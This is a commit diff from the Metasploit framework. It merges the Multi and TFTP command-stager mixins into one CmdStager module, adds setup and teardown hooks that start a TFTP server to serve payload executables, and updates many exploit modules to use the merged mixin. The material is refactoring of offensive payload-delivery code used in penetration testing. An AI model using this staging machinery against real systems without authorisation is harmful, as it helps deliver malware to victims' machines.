Use One CMDStagermixin
parent
0a99b549d6
commit
7ced5927d8
|
@ -1,97 +0,0 @@
|
||||||
# -*- coding: binary -*-
|
|
||||||
|
|
||||||
require 'msf/core/exploit/cmdstager'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This mixin provides an interface for staging cmd to arbitrary payloads
|
|
||||||
#
|
|
||||||
###
|
|
||||||
module Exploit::CmdStager::Multi
|
|
||||||
|
|
||||||
include Msf::Exploit::CmdStager
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super
|
|
||||||
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptString.new('CMDSTAGER::DECODERSTUB', [ false, 'The decoder stub to use.', nil]),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_stager(exe, opts)
|
|
||||||
case opts[:flavor]
|
|
||||||
when :bourne
|
|
||||||
return Rex::Exploitation::CmdStagerBourne.new(exe)
|
|
||||||
when :debug_asm
|
|
||||||
return Rex::Exploitation::CmdStagerDebugAsm.new(exe)
|
|
||||||
when :debug_write
|
|
||||||
return Rex::Exploitation::CmdStagerDebugWrite.new(exe)
|
|
||||||
when :echo
|
|
||||||
return Rex::Exploitation::CmdStagerEcho.new(exe)
|
|
||||||
when :printf
|
|
||||||
return Rex::Exploitation::CmdStagerPrintf.new(exe)
|
|
||||||
when :vbs, :vbs_adodb
|
|
||||||
return Rex::Exploitation::CmdStagerVBS.new(exe)
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
def execute_cmdstager(opts = {})
|
|
||||||
if not opts.include?(:flavor)
|
|
||||||
default_flavor = guess_flavor
|
|
||||||
vprint_status("Using default stager: #{default_flavor}")
|
|
||||||
opts[:flavor] = default_flavor
|
|
||||||
end
|
|
||||||
|
|
||||||
if not opts.include?(:decoder)
|
|
||||||
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
|
|
||||||
end
|
|
||||||
|
|
||||||
super
|
|
||||||
end
|
|
||||||
|
|
||||||
def generate_cmdstager(opts = {}, pl = nil)
|
|
||||||
if not opts.include?(:decoder)
|
|
||||||
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
|
|
||||||
end
|
|
||||||
|
|
||||||
super
|
|
||||||
end
|
|
||||||
|
|
||||||
def guess_decoder(opts)
|
|
||||||
case opts[:flavor]
|
|
||||||
when :debug_asm
|
|
||||||
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
|
|
||||||
when :debug_write
|
|
||||||
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
|
|
||||||
when :vbs
|
|
||||||
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
|
|
||||||
when :vbs_adodb
|
|
||||||
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
|
|
||||||
end
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
|
|
||||||
def guess_flavor
|
|
||||||
c_platform = nil
|
|
||||||
if target_platform.names.length == 1
|
|
||||||
c_platform = target_platform.names.first
|
|
||||||
end
|
|
||||||
case c_platform
|
|
||||||
when 'linux', 'Linux'
|
|
||||||
return :bourne
|
|
||||||
when 'osx', 'OSX'
|
|
||||||
return :bourne
|
|
||||||
when 'unix', 'Unix'
|
|
||||||
return :bourne
|
|
||||||
when 'win', 'Windows'
|
|
||||||
return :vbs
|
|
||||||
end
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -1,67 +0,0 @@
|
||||||
# -*- coding: binary -*-
|
|
||||||
|
|
||||||
require 'rex/text'
|
|
||||||
require 'msf/core/exploit/tftp'
|
|
||||||
require 'msf/core/exploit/cmdstager'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This mixin provides an interface for staging cmd to arbitrary payloads
|
|
||||||
#
|
|
||||||
###
|
|
||||||
module Exploit::CmdStager::TFTP
|
|
||||||
|
|
||||||
include Msf::Exploit::CmdStager
|
|
||||||
include Msf::Exploit::TFTPServer
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super
|
|
||||||
|
|
||||||
register_advanced_options(
|
|
||||||
[
|
|
||||||
OptString.new( 'TFTPHOST', [ false, 'The address of the machine hosting the file via TFTP.' ]),
|
|
||||||
OptString.new( 'TFTPRSRC', [ false, 'The filename of the TFTP-hosted resource.' ]),
|
|
||||||
], self.class)
|
|
||||||
end
|
|
||||||
|
|
||||||
def create_stager(exe, opts)
|
|
||||||
Rex::Exploitation::CmdStagerTFTP.new(exe)
|
|
||||||
end
|
|
||||||
|
|
||||||
def execute_cmdstager(opts = {})
|
|
||||||
tftphost = datastore['TFTPHOST']
|
|
||||||
tftphost ||= datastore['SRVHOST']
|
|
||||||
tftphost ||= datastore['LHOST']
|
|
||||||
|
|
||||||
@exe_tag = datastore['TFTPRSRC']
|
|
||||||
@exe_tag ||= Rex::Text.rand_text_alphanumeric(8)
|
|
||||||
|
|
||||||
opts.merge!({ :tftphost => tftphost, :transid => @exe_tag })
|
|
||||||
|
|
||||||
super
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Start the service and register the file
|
|
||||||
#
|
|
||||||
def execute_cmdstager_begin(opts)
|
|
||||||
start_service(@exe_tag, @exe)
|
|
||||||
end
|
|
||||||
|
|
||||||
#
|
|
||||||
# Stop the service
|
|
||||||
#
|
|
||||||
def execute_cmdstager_end(opts)
|
|
||||||
stop_service
|
|
||||||
end
|
|
||||||
|
|
||||||
def payload_exe
|
|
||||||
return nil if not @stager_instance
|
|
||||||
@stager_instance.payload_exe
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
||||||
|
|
||||||
end
|
|
|
@ -19,8 +19,12 @@ module Exploit::CmdStager
|
||||||
#
|
#
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super
|
super
|
||||||
@cmd_list = nil
|
|
||||||
@stager_instance = nil
|
@stager_instance = nil
|
||||||
|
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptString.new('CMDSTAGER::DECODERSTUB', [ false, 'The decoder stub to use.', nil]),
|
||||||
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -28,10 +32,27 @@ module Exploit::CmdStager
|
||||||
# Execute the command stager while showing the progress
|
# Execute the command stager while showing the progress
|
||||||
#
|
#
|
||||||
def execute_cmdstager(opts = {})
|
def execute_cmdstager(opts = {})
|
||||||
|
|
||||||
|
# Starts select the correct stager
|
||||||
|
unless opts.include?(:flavor)
|
||||||
|
default_flavor = guess_flavor
|
||||||
|
vprint_status("Using default stager: #{default_flavor}")
|
||||||
|
opts[:flavor] = default_flavor
|
||||||
|
end
|
||||||
|
|
||||||
|
unless opts.include?(:decoder)
|
||||||
|
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
|
||||||
|
end
|
||||||
|
# Ends select the correct stager
|
||||||
|
|
||||||
cmd_list = generate_cmdstager(opts)
|
cmd_list = generate_cmdstager(opts)
|
||||||
|
|
||||||
|
@stager_instance.setup(self)
|
||||||
|
|
||||||
|
begin
|
||||||
execute_cmdstager_begin(opts)
|
execute_cmdstager_begin(opts)
|
||||||
|
|
||||||
|
|
||||||
sent = 0
|
sent = 0
|
||||||
total_bytes = 0
|
total_bytes = 0
|
||||||
cmd_list.each { |cmd| total_bytes += cmd.length }
|
cmd_list.each { |cmd| total_bytes += cmd.length }
|
||||||
|
@ -51,6 +72,9 @@ module Exploit::CmdStager
|
||||||
end
|
end
|
||||||
|
|
||||||
execute_cmdstager_end(opts)
|
execute_cmdstager_end(opts)
|
||||||
|
ensure
|
||||||
|
@stager_instance.teardown
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -59,11 +83,18 @@ module Exploit::CmdStager
|
||||||
# and operating system.
|
# and operating system.
|
||||||
#
|
#
|
||||||
def generate_cmdstager(opts = {}, pl = nil)
|
def generate_cmdstager(opts = {}, pl = nil)
|
||||||
|
|
||||||
|
# starts Multi task
|
||||||
|
unless opts.include?(:decoder)
|
||||||
|
opts[:decoder] = datastore['CMDSTAGER::DECODERSTUB'] || guess_decoder(opts)
|
||||||
|
end
|
||||||
|
# ends Multi task
|
||||||
|
|
||||||
pl ||= payload.encoded
|
pl ||= payload.encoded
|
||||||
|
|
||||||
@exe = generate_payload_exe
|
@exe = generate_payload_exe
|
||||||
|
|
||||||
@stager_instance = create_stager(@exe, opts)
|
@stager_instance = create_stager(opts)
|
||||||
cmd_list = @stager_instance.generate(opts)
|
cmd_list = @stager_instance.generate(opts)
|
||||||
|
|
||||||
if (cmd_list.nil? or cmd_list.length < 1)
|
if (cmd_list.nil? or cmd_list.length < 1)
|
||||||
|
@ -84,6 +115,57 @@ module Exploit::CmdStager
|
||||||
print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
|
print_status("Command Stager progress - %7s done (%d/%d bytes)" % [percent, sent, total])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def create_stager(opts)
|
||||||
|
case opts[:flavor]
|
||||||
|
when :bourne
|
||||||
|
return Rex::Exploitation::CmdStagerBourne.new(@exe)
|
||||||
|
when :debug_asm
|
||||||
|
return Rex::Exploitation::CmdStagerDebugAsm.new(@exe)
|
||||||
|
when :debug_write
|
||||||
|
return Rex::Exploitation::CmdStagerDebugWrite.new(@exe)
|
||||||
|
when :echo
|
||||||
|
return Rex::Exploitation::CmdStagerEcho.new(@exe)
|
||||||
|
when :printf
|
||||||
|
return Rex::Exploitation::CmdStagerPrintf.new(@exe)
|
||||||
|
when :vbs, :vbs_adodb
|
||||||
|
return Rex::Exploitation::CmdStagerVBS.new(@exe)
|
||||||
|
when :tftp
|
||||||
|
return Rex::Exploitation::CmdStagerTFTP.new(@exe)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def guess_decoder(opts)
|
||||||
|
case opts[:flavor]
|
||||||
|
when :debug_asm
|
||||||
|
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")
|
||||||
|
when :debug_write
|
||||||
|
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")
|
||||||
|
when :vbs
|
||||||
|
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
|
||||||
|
when :vbs_adodb
|
||||||
|
return File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
|
||||||
|
end
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
|
def guess_flavor
|
||||||
|
c_platform = nil
|
||||||
|
if target_platform.names.length == 1
|
||||||
|
c_platform = target_platform.names.first
|
||||||
|
end
|
||||||
|
case c_platform
|
||||||
|
when 'linux', 'Linux'
|
||||||
|
return :bourne
|
||||||
|
when 'osx', 'OSX'
|
||||||
|
return :bourne
|
||||||
|
when 'unix', 'Unix'
|
||||||
|
return :bourne
|
||||||
|
when 'win', 'Windows'
|
||||||
|
return :vbs
|
||||||
|
end
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Methods to override - not used internally
|
# Methods to override - not used internally
|
||||||
#
|
#
|
||||||
|
|
|
@ -172,6 +172,19 @@ class CmdStagerBase
|
||||||
nil
|
nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Should be overriden if the cmd stager needs to setup anything
|
||||||
|
# before it's executed
|
||||||
|
def setup(mod)
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Should be overriden if the cmd stager needs to do any clenaup
|
||||||
|
#
|
||||||
|
def teardown
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -27,7 +27,6 @@ class CmdStagerTFTP < CmdStagerBase
|
||||||
|
|
||||||
def initialize(exe)
|
def initialize(exe)
|
||||||
super
|
super
|
||||||
|
|
||||||
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
|
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -51,11 +50,23 @@ class CmdStagerTFTP < CmdStagerBase
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def setup_stager(mod)
|
||||||
|
tftp = Rex::Proto::TFTP::Server.new
|
||||||
|
tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
|
||||||
|
tftp.start
|
||||||
|
mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
|
||||||
|
end
|
||||||
|
|
||||||
|
def teardown_stager
|
||||||
|
tftp.stop
|
||||||
|
end
|
||||||
|
|
||||||
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
|
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
|
||||||
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
|
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
|
||||||
# the start command being issued separately so that it can ignore it :)
|
# the start command being issued separately so that it can ignore it :)
|
||||||
|
attr_reader :exe
|
||||||
attr_reader :payload_exe
|
attr_reader :payload_exe
|
||||||
|
attr_accessor :tftp
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
|
@ -193,6 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
@cookie = ''
|
@cookie = ''
|
||||||
|
|
||||||
setup_stager
|
setup_stager
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -88,10 +88,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def windows_stager
|
def windows_stager
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::HttpServer
|
include Msf::Exploit::Remote::HttpServer
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
|
|
||||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
|
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
|
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ require 'net/ssh'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
attr_accessor :ssh_socket
|
attr_accessor :ssh_socket
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -50,11 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def windows_stager
|
def windows_stager
|
||||||
|
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -52,11 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def windows_stager
|
def windows_stager
|
||||||
|
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
|
'CMDSTAGER::DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot")
|
||||||
},
|
},
|
||||||
'DisclosureDate' => 'Jul 29 2013'))
|
'DisclosureDate' => 'Jul 29 2013'))
|
||||||
|
|
||||||
|
|
|
@ -8,7 +8,7 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
@ -53,11 +53,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def windows_stager
|
def windows_stager
|
||||||
|
|
||||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
|
||||||
|
|
||||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||||
execute_cmdstager({ :temp => '.'})
|
execute_cmdstager({ :temp => '.', :flavor => :tftp})
|
||||||
@payload_exe = payload_exe
|
@payload_exe = payload_exe
|
||||||
|
|
||||||
print_status("Attempting to execute the payload...")
|
print_status("Attempting to execute the payload...")
|
||||||
|
|
|
@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerMulti
|
include Msf::Exploit::CmdStager
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
|
|
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# NOTE: This cannot be an HttpClient module since the response from the server
|
# NOTE: This cannot be an HttpClient module since the response from the server
|
||||||
# is not a valid HttpResponse
|
# is not a valid HttpResponse
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# Use the CMD stager to get a payload running
|
# Use the CMD stager to get a payload running
|
||||||
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
|
execute_cmdstager({:temp => '.', :linemax => 1400, :cgifname => exe_fname, :flavor => :tftp})
|
||||||
|
|
||||||
# Save these file names for later deletion
|
# Save these file names for later deletion
|
||||||
@exe_cmd_copy = exe_fname
|
@exe_cmd_copy = exe_fname
|
||||||
|
|
|
@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::CmdStagerTFTP
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
|
@ -327,7 +327,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
